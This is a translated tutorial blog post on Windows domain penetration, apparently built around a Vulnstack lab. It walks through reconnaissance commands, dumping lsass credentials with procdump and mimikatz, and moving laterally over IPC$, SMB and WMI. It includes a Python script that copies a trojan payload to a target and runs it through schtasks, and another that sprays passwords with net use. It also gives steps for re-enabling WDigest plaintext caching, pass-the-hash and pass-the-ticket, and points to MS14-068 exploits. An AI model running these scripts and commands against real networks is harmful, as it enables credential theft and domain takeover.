Getting started with intranet penetration

0x00 Preface

Intranet penetration mainly starts from the web server compromised (getshell) during the earlier perimeter phase. Information is collected on that web server and then used for password attacks against the other intranet hosts. Of course, some attacks are vulnerability-based as well.

Intranet-related concepts are not introduced here; look them up yourself: what a domain is, the difference between a domain and a workgroup, what a DC is, what AD is, and so on. The concepts are unfamiliar and hard to grasp on their own, and become much easier to understand when combined with a real environment. For a detailed walkthrough of an intranet lab, see: Vulnstack (1)

Intranet penetration often also involves intranet tunnelling. For how to understand tunnelling, port forwarding, port mapping and related knowledge, see: How to build an understanding of intranet penetration from scratch.

The practical part is written rather hastily; its main purpose is to build understanding, broaden ideas and extend knowledge. In practice there are many excellent integrated tools, and these methods are rarely used one by one. Of course, in most cases you also need to consider AV evasion, and then you may split a step into separate parts, each evaded and exploited on its own.

0x01 Information Collection

View detailed system information, such as the OS version and installed patches, and use it to filter for exploitable vulnerabilities:

systeminfo


Check the running services; the host's role in the domain can often be inferred from them:

net start


View the process list:

tasklist


Check open ports and the processes behind them:

netstat -ano


Determine whether a domain exists:

net view /domain


View the host name, domain DNS servers and IP addresses:

ipconfig /all


View hosts in the domain:

net view


Hosts in the domain synchronise their time with the domain controller, so this command can be used to identify the DC:

net time /domain


Resolve a name to its IP:

nslookup <domain-name>


View logon information (logon domain, workstation name):

net config workstation


View user information:

whoami /all


View the users in the domain; this list doubles as a username dictionary for password attacks against other hosts:

net user /domain


This command can be run directly on the DC; running it from other domain hosts requires the DC's RPC service to be reachable.

Probe for live hosts in the domain:

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="


You can also use third-party tools such as nmap and masscan, or third-party scripts such as Empire and Nishang, but the big advantage of built-in system commands is that you don't have to worry about AV evasion.

There is actually another machine, STU1, in the domain, but its firewall is on and blocks ping. This is probably also why STU1 did not appear in the earlier net view output. Turn the firewall off and try again:

  • Obtaining computer user hashes and plaintext passwords:

    mimikatz: Windows; mimipenguin: Linux.

  • Obtaining passwords for various protocols and services:

    LaZagne: Windows, Linux and macOS. Broad coverage, average depth.

    XenArmor: Windows, paid.

  • Detecting live hosts and address information in the domain:

    Built-in commands (.bat), nmap, masscan, PowerShell third-party scripts: Empire, Nishang.

Note that Mimikatz is third-party software; uploading it directly to the target host may be detected by anti-virus. Instead, use Microsoft's own ProcDump: upload ProcDump to the target and dump the lsass process memory (the dump file itself is not human-readable), then open the dump with Mimikatz on your own machine to extract the credentials.

mimikatz download:

https://github.com/gentilkiwi/mimikatz/releases

procdump download:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
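To tie the output of the commands above to the decisions made in later sections, here is an added example that is not part of the original article. It parses constructed systeminfo and netstat -ano output: it extracts the OS version, domain and hotfix list, checks whether KB2871997 (the WDigest patch discussed in 0x05) is installed, and maps the listening ports to the lateral-movement methods covered below (IPC$/SMB on 139/445, WMI/DCOM on 135, RDP on 3389). The sample outputs, host name, PIDs and hotfix list are constructed, and the triage function and its field names are my own.

```python
import re

# Constructed sample output (not captured from a real host) standing in for `systeminfo`.
SYSTEMINFO_SAMPLE = """\
Host Name:                 WEB
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Domain:                    god.org
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB976902
"""

# Constructed sample output standing in for `netstat -ano`.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1504
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       744
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1260
  TCP    192.168.52.143:139     0.0.0.0:0              LISTENING       4
  TCP    192.168.52.143:3389    192.168.52.1:51022     ESTABLISHED     1260
  UDP    0.0.0.0:137            *:*                                    4
"""

WDIGEST_PATCH = "KB2871997"  # backport that stops WDigest from caching plaintext credentials


def parse_systeminfo(text):
    """Pull the fields we care about out of `systeminfo` output."""
    fields = {}
    for key in ("OS Name", "OS Version", "Domain"):
        m = re.search(rf"^{re.escape(key)}:\s+(.+?)\s*$", text, re.MULTILINE)
        fields[key] = m.group(1) if m else None
    fields["hotfixes"] = re.findall(r"\[\d+\]:\s*(KB\d+)", text)
    return fields


def parse_listening_tcp(text):
    """Return the set of TCP ports in LISTENING state from `netstat -ano` output."""
    ports = set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "TCP" and parts[3] == "LISTENING":
            ports.add(int(parts[1].rsplit(":", 1)[1]))  # rsplit also copes with [::]:port
    return ports


def triage(systeminfo_text, netstat_text):
    """Combine both outputs into the facts that drive the later sections."""
    info = parse_systeminfo(systeminfo_text)
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", info["OS Version"] or "")
    major_minor = (int(m.group(1)), int(m.group(2))) if m else (0, 0)
    patched = WDIGEST_PATCH in info["hotfixes"]
    # WDigest no longer caches plaintext by default from NT 6.3 (8.1 / 2012 R2);
    # older systems still do unless KB2871997 is installed.
    wdigest_plaintext = major_minor < (6, 3) and not patched
    listening = parse_listening_tcp(netstat_text)

    notes = []
    if listening & {139, 445}:
        notes.append("SMB reachable: IPC$ methods (net use, at/schtasks, psexec) apply")
    if 135 in listening:
        notes.append("RPC endpoint mapper reachable: WMI/DCOM methods apply")
    if 3389 in listening:
        notes.append("RDP listening: plaintext credentials give an interactive session")
    if wdigest_plaintext:
        notes.append("WDigest likely caches plaintext: dump lsass with procdump, read with mimikatz")
    else:
        notes.append("Plaintext unlikely in lsass: plan for pass-the-hash or offline cracking")

    return {
        "os_name": info["OS Name"],
        "os_version": m.group(0) if m else None,
        "domain": info["Domain"],
        "hotfixes": info["hotfixes"],
        "kb2871997_installed": patched,
        "wdigest_plaintext_likely": wdigest_plaintext,
        "listening_tcp": listening,
        "notes": notes,
    }


if __name__ == "__main__":
    for key, value in triage(SYSTEMINFO_SAMPLE, NETSTAT_SAMPLE).items():
        print(f"{key}: {value}")
```

In the field, replace the two sample strings with the real output (for example, redirect systeminfo and netstat -ano to files on the web server and read them in); nothing else needs to change.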

0x02 IPC & SMB & WMI

As mentioned before, intranet penetration is mainly a password-based attack. A domain contains many hosts and many domain users, and to make them easier to remember and manage, many domain members reuse passwords. Once we obtain one domain member's password, we can use it to widen the breach step by step: keep enriching our password dictionary and keep spraying the hosts in the domain until the DC falls.

Windows provides many protocols and related functions that we can use to pass a user's credentials for authentication.

1. SMB protocol

SMB is a client/server, request/response protocol. Through SMB, client applications can read and write files on a server and request services from server programs in a variety of network environments. Applications can also use SMB to access files on a remote server, as well as resources such as printers, mailslots and named pipes.

In a TCP/IP environment, the client connects to the server via NetBIOS over TCP/IP (or NetBEUI, or IPX/SPX). Once connected, the client sends SMB commands to the server and can access shared directories, open files, read and write files, and do everything else that can be done on a file system.

Put another way: what matters most in a domain? One thing is security (the internal network is isolated from the external one); the other is resource sharing; after all, everyone is in the same boat. SMB is the protocol used to share those resources, including the named pipes used by IPC$ connections.

In Windows NT, SMB was implemented on top of NBT (NetBIOS over TCP/IP), which uses UDP 137, UDP 138 and TCP 139 to carry NetBIOS over TCP/IP. From Windows 2000 onward, SMB can also run directly over TCP port 445. My understanding is that 445 is an upgrade of 139: the conditions for using 139 are stricter than for 445, but both carry the SMB protocol, so the two do not conflict.

2. IPC

IPC (Inter-Process Communication) refers to the exchange of data between two processes. The main mechanisms are shared memory, message queues and pipes. Shared memory is mainly used between processes on the same computer, while message queues and pipes are also used in distributed environments (communicating processes on different computers connected over a network).

A named pipe is a simple inter-process communication (IPC) mechanism supported by most versions of Microsoft Windows (but not Windows CE). Named pipes support reliable one-way or two-way data communication between different processes on the same computer, or between processes on different computers across a network. An important reason they are recommended as an IPC solution is that they take full advantage of Windows' built-in security features (ACLs, etc.).

Like TCP/IP (Transmission Control Protocol / Internet Protocol), named pipes are a communication protocol. They are generally used on local area networks, because the client needs permission to access the server's resources (via SMB).

In a fast local area network (LAN), TCP/IP socket clients and named pipe clients perform comparably. The slower the network, the more pronounced the difference between them becomes, because TCP/IP socket transfers are more efficient and have less overhead; they can also take advantage of TCP/IP performance mechanisms such as windowing and delayed acknowledgements, which help a great deal on slow links. Named pipe communication is generally more interactive: one peer does not send data until the other requests it with a read, and a network read typically involves a series of peeks into the pipe before the data is actually read. On a slow network this is costly, generates excessive traffic, and in turn affects other clients.

There are generally two reasons for using named pipes:

  • Speed: on a local area network, the named pipe protocol is faster than TCP/IP.
  • Security: because named pipes can only be used on the LAN, a server that disables TCP/IP and enables only named pipes avoids some exposure.

To summarise, IPC$ is the share through which named pipes are exposed; it is a named pipe opened for inter-process communication. By providing a trusted username and password, the two sides establish a secure channel and exchange encrypted data over it, thereby gaining access to the remote computer. We can therefore use it to brute-force usernames and passwords. Note that IPC$ requires port 139 or 445 to be open.

3. WMI

Windows Management Instrumentation (WMI) is a set of extensions to the Windows Driver Model. WMI allows scripting languages such as VBScript or Windows PowerShell to manage Microsoft Windows PCs and servers locally or remotely.

Put simply, WMI exposes system management data and operations through a uniform interface; tools such as wmic in cmd or the WMI/CIM cmdlets in PowerShell are front ends to it, which makes managing computers convenient.

When it comes to remote management, several ports matter: 22, 23, 135, 139, 445, 3389 and so on. Ports 139 and 445 were discussed above. Port 22 is SSH (Linux), 23 is Telnet, and 3389 is RDP (Remote Desktop); these are easy to understand. Let's focus on port 135.

Port 135 is used by the RPC (Remote Procedure Call) endpoint mapper and provides DCOM (Distributed Component Object Model) services. RPC lets a program running on one computer execute code on a remote computer; DCOM communicates directly over the network and can be carried over a variety of transports, including HTTP.

Inter-process communication (IPC) is a technique for communication between programs and processes running on a multitasking operating system or on networked computers. There are two types of IPC.

Local Procedure Call (LPC): used within a multitasking operating system to let concurrently running tasks talk to each other. These tasks share memory, which lets them synchronise and pass information to one another.

Remote Procedure Call (RPC): similar to LPC, but it works over the network. RPC first appeared on computers running the UNIX systems of Sun Microsystems and HP.

Simply put, RPC is what supports remote IPC connections, and WMI in turn relies on RPC/DCOM (port 135) for remote management.

4. Summary

SMB is used to achieve sharing, and IPC is used to establish the connection; how could there be sharing without a connection? As mentioned above, what is shared includes named pipes, and named pipes are the connection method, so SMB sharing actually includes IPC and, moreover, relies on IPC connections. In the end, remote management of the connected computer still relies on WMI (over RPC).

0x03 at & schtasks

at and schtasks both create scheduled tasks: at is used on versions before Windows 2012 (it has since been removed), schtasks on Windows 2012 and later (it also exists on older versions).

Scenario:

You have obtained control of a host on the intranet (the web server), know the domain username and password used on that host, and know the names of other users in the domain.

Procedure:

1. Establish an IPC$ connection to the target host (with the plaintext password)

2. Copy the script or program to be executed to the target host

3. Check the target's time and create a scheduled task (at or schtasks) that runs the copied file

4. Delete the IPC$ connection


View current network connections:

net use


Use the plaintext password hongrisec@2021 to establish an IPC$ connection to 192.168.52.143 as the user god\administrator:

net use \\192.168.52.143\ipc$ "hongrisec@2021" /user:god\administrator


First upload the payload to the web server compromised during the perimeter phase, then copy it from the web server to the target host over the IPC$ connection just established:

copy C:\Users\liukaifeng01\Desktop\muma.exe \\192.168.52.143\C$



1. at

For versions before Windows 2012, add a scheduled task (the time is the target's local time, as shown by net time \\192.168.52.143):

at \\192.168.52.143 15:30 C:\muma.exe

2. schtasks (Windows 2012 and later)

For Windows 2012 and later, create a scheduled task that runs the copied file:

schtasks /create /s 192.168.52.143 /ru "SYSTEM" /tn adduser /sc DAILY /tr C:\muma.exe /F

Run the adduser task:

schtasks /run /s 192.168.52.143 /tn adduser

Delete the adduser task (/F suppresses the confirmation prompt, which would otherwise hang a non-interactive shell):

schtasks /delete /s 192.168.52.143 /tn adduser /F
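As an added example that is not from the original article, the following Python script drives the four steps above from the compromised web server: it reads the target's clock from net time, schedules the task two minutes ahead in the target's local time, switches between at and schtasks with a flag, and always tears down the task and the IPC$ session in a finally block, so step 4 is not skipped when something fails midway. The net time sample output and the timestamp formats it tries are assumptions (the format depends on the target's locale); the target, credentials and paths reuse the values from the commands above.

```python
import re
import subprocess
from datetime import datetime, timedelta

# Constructed sample of `net time \\192.168.52.143` output (not captured from a real host).
NET_TIME_SAMPLE = """\
Current time at \\\\192.168.52.143 is 2021/8/10 15:28:04

The command completed successfully.
"""

# Assumed timestamp layouts; `net time` prints the target's locale format, add yours here.
NET_TIME_FORMATS = ("%Y/%m/%d %H:%M:%S", "%m/%d/%Y %I:%M:%S %p", "%d.%m.%Y %H:%M:%S")


def parse_net_time(output):
    """Extract the target's local time from `net time \\target` output."""
    m = re.search(r"\bis\s+(.+?)\s*$", output, re.MULTILINE)
    if not m:
        raise ValueError("no timestamp found in net time output")
    stamp = m.group(1)
    for fmt in NET_TIME_FORMATS:
        try:
            return datetime.strptime(stamp, fmt)
        except ValueError:
            continue
    raise ValueError(f"unrecognised time format: {stamp!r}")


def build_plan(target, domain, user, password, local_payload, remote_name, target_now,
               task_name="adduser", legacy_at=False, delay_minutes=2):
    """Return (commands, run_at): steps 1-3 as argv lists, run_at in the target's local time."""
    unc = f"\\\\{target}"
    run_at = (target_now + timedelta(minutes=delay_minutes)).strftime("%H:%M")
    remote_path = f"C:\\{remote_name}"
    commands = [
        ["net", "use", f"{unc}\\ipc$", password, f"/user:{domain}\\{user}"],  # step 1
        ["copy", local_payload, f"{unc}\\C$\\{remote_name}"],                   # step 2
    ]
    if legacy_at:  # step 3 on hosts older than Windows 2012
        commands.append(["at", unc, run_at, remote_path])
    else:          # step 3 on Windows 2012 and later (ONCE needs /st; /run fires it immediately)
        commands.append(["schtasks", "/create", "/s", target, "/ru", "SYSTEM", "/tn", task_name,
                         "/sc", "ONCE", "/st", run_at, "/tr", remote_path, "/F"])
        commands.append(["schtasks", "/run", "/s", target, "/tn", task_name])
    return commands, run_at


def cleanup_plan(target, task_name="adduser", legacy_at=False):
    """Step 4 plus task removal; run these even if an earlier step failed."""
    commands = []
    if not legacy_at:
        commands.append(["schtasks", "/delete", "/s", target, "/tn", task_name, "/F"])
    commands.append(["net", "use", f"\\\\{target}\\ipc$", "/del"])
    return commands


def run(commands, stop_on_error=True):
    """Execute each command through cmd.exe (copy is a cmd builtin)."""
    for argv in commands:
        print(">", " ".join(argv))
        result = subprocess.run(["cmd", "/c", *argv], capture_output=True, text=True)
        if result.returncode != 0 and stop_on_error:
            raise RuntimeError(f"{argv[0]} failed: {result.stderr.strip() or result.stdout.strip()}")


if __name__ == "__main__":
    tgt = "192.168.52.143"
    clock = subprocess.run(["net", "time", f"\\\\{tgt}"], capture_output=True, text=True).stdout
    plan, when = build_plan(tgt, "god", "administrator", "hongrisec@2021",
                            r"C:\Users\liukaifeng01\Desktop\muma.exe", "muma.exe",
                            parse_net_time(clock))
    try:
        run(plan)
        print(f"task scheduled for {when} (target local time)")
    finally:
        run(cleanup_plan(tgt), stop_on_error=False)  # step 4: never leave the IPC$ session behind
```

Leaving the IPC$ session open is not only untidy: a later net use to the same host with a different account fails with system error 1219, which is also why the cleanup matters when spraying many accounts against one host.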

3. impacket

impacket is a toolkit of protocol implementations and example tools. For at/schtasks there is atexec.py (atexec.exe in the compiled Windows build), which connects to the remote task scheduler service and runs a system command with a single invocation.

Python version of impacket download:

https://github.com/SecureAuthCorp/impacket

exe version impacket download:

https://gitee.com/RichChigga/impacket-examples-windows

In practice, once we take down the web server and collect the passwords found on it together with all domain users, local users and the IPs of live hosts in the domain, we can use the users as the username dictionary, the IPs as the host list and the passwords as the password dictionary, and perform batch connection attempts (password spraying) to find which hosts accept which credentials. A successful connection means we can take that host through scheduled tasks or other methods; from the new host we harvest new passwords, enrich the dictionary, and spray again, repeating until the DC is obtained.

As shown in the figure above, a bat script conveniently iterates over only one variable. To iterate over three at once, use Python: build three lists, nest three loops, generate the command string, and run it with os.system() from the os module. Note that domain hosts usually have no Python installed, so package the script with PyInstaller into a standalone executable that runs directly on Windows:

pip install pyinstaller
pyinstaller -F app.py

import os, time

# Live hosts, domain users and candidate passwords collected earlier (lists keep the order deterministic)
ips = [
   '192.168.3.21',
   '192.168.3.25',
   '192.168.3.29',
   '192.168.3.30',
   '192.168.3.31',
   '192.168.3.33'
]

users = [
   'Administrator',
   'boss',
   'dbadmin',
   'fileadmin',
   'mack',
   'mary',
   'vpnadm',
   'webadmin'
]
passes = [
   'admin',
   'admin!@#45',
   'Admin12345'
]

for ip in ips:
   for user in users:
       for mima in passes:
           # Backslashes must be escaped in Python strings: \\host\ipc$ and god\user
           cmd = 'net use \\\\' + ip + '\\ipc$ "' + mima + '" /user:god\\' + user
           print('--->' + cmd + '<---')
           # net use returns 0 on success; record the hit and drop the session,
           # otherwise the next account against the same host fails with error 1219
           if os.system(cmd) == 0:
               print('[+] ' + ip + ' ' + user + ' ' + mima)
               os.system('net use \\\\' + ip + '\\ipc$ /del')
           time.sleep(1)

0x04 smb & wmi

The approach is the same as before; only the commands differ.

PsExec is part of Microsoft's official PsTools (Sysinternals), so AV evasion is not a concern. The figure above says that the second psexec method and smbexec do not need an IPC$ connection, which I think is inaccurate: these methods differ only in their commands, and when a plaintext account and password are supplied an IPC$ connection is still established, because they are all built on IPC$ sharing.

Another thing to note: the official PsExec does not support authenticating with a hash. If you only have a hash, you can use the impacket toolkit instead, but then AV evasion must be considered.


I personally think there is no essential difference between the methods introduced above: they are all based on IPC$ sharing, which requires port 139 or 445 to be open. Beyond that, port 135 is also hard to do without, since the RPC services behind it (and WMI/DCOM on top of them) are used when establishing and managing these remote connections. IPC$ sharing exists so that administrators can operate and manage hosts remotely, but we can use the response returned during authentication to brute-force passwords.

0x05 pth & ptk & ptt

PTH: pass the hash (LM, NTLM)

PTK: pass the key (AES 256)

PTT: pass the ticket

Windows Server 2012 R2 and Windows 8.1 and later disable WDigest by default, so attackers cannot obtain plaintext passwords from memory; installing the KB2871997 patch on older versions has the same effect.

For this situation there are the following options:

1. Move laterally by passing the hash (pth, ptk, etc.)

2. Re-enable WDigest via the registry (set UseLogonCredential to 1 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest); plaintext credentials are cached again only for logons after the change

3. Crack the hash with tools or third-party platforms (Hashcat)

Windows authentication uses the LM hash and NTLM hash algorithms. Since Windows Vista (client) and Windows Server 2008, the LM hash is no longer stored by default and the NTLM hash is used.

If you only have a hash, you can either try to crack it locally or use the impacket tools introduced earlier, which accept a hash in place of a password and execute system commands directly. Advantages: built-in privilege escalation, simple commands, powerful. Disadvantage: unofficial tools, easily flagged by AV.

Both PTH and PTK can be performed with mimikatz (sekurlsa::pth); I won't go into detail here, look up the mimikatz documentation.

Download hash cracking tool hashcat: https://github.com/hashcat/hashcat


Note that ptk (passing the AES key) is said to work only on hosts with KB2871997 installed.

PTT attacks are not simple NTLM authentication; they abuse the Kerberos protocol.

Briefly, how Kerberos works in a domain:

1. The client encrypts a timestamp with a key derived from the user's password (for RC4 this is the user's NTLM hash) and sends it to the KDC (the domain controller). The KDC verifies the user and, on success, creates a TGT (Ticket-Granting Ticket).

2. The KDC returns the TGT to the client. The TGT is encrypted with the krbtgt account's key, so only the KDC can read its contents.

3. The client sends the TGT back to the KDC to request a TGS (service ticket) for a target service; the KDC validates the TGT.

4. On success, the KDC issues the service ticket encrypted with the target service account's key (its NTLM hash) and returns it to the client.

Bluntly put, tickets are like cookies. We need a fresh one (not expired; by default a TGT is valid for about ten hours after logon), inject it into memory, and pass authentication by impersonation.


This can be exploited with a vulnerability PoC or with tools. MS14-068 PoC download:

https://github.com/abaatchy17/WindowsExploits/tree/master/MS14-068

kekeo download:

https://github.com/gentilkiwi/kekeo/releases


Finally

From the perspective of the times, there is endless knowledge to learn in network security, and there will be even more in the future. Students must get their mindset right: having chosen to get started in network security, you should not stop at the entry level. The stronger your ability, the more opportunities you have.

Because the knowledge points at the introductory stage are quite scattered, I have spoken in general terms. If there is anything you do not understand, you can ask me, and I promise to explain everything I know. If you need related materials, you can also ask me; a lot of material on my network drive is gathering dust.
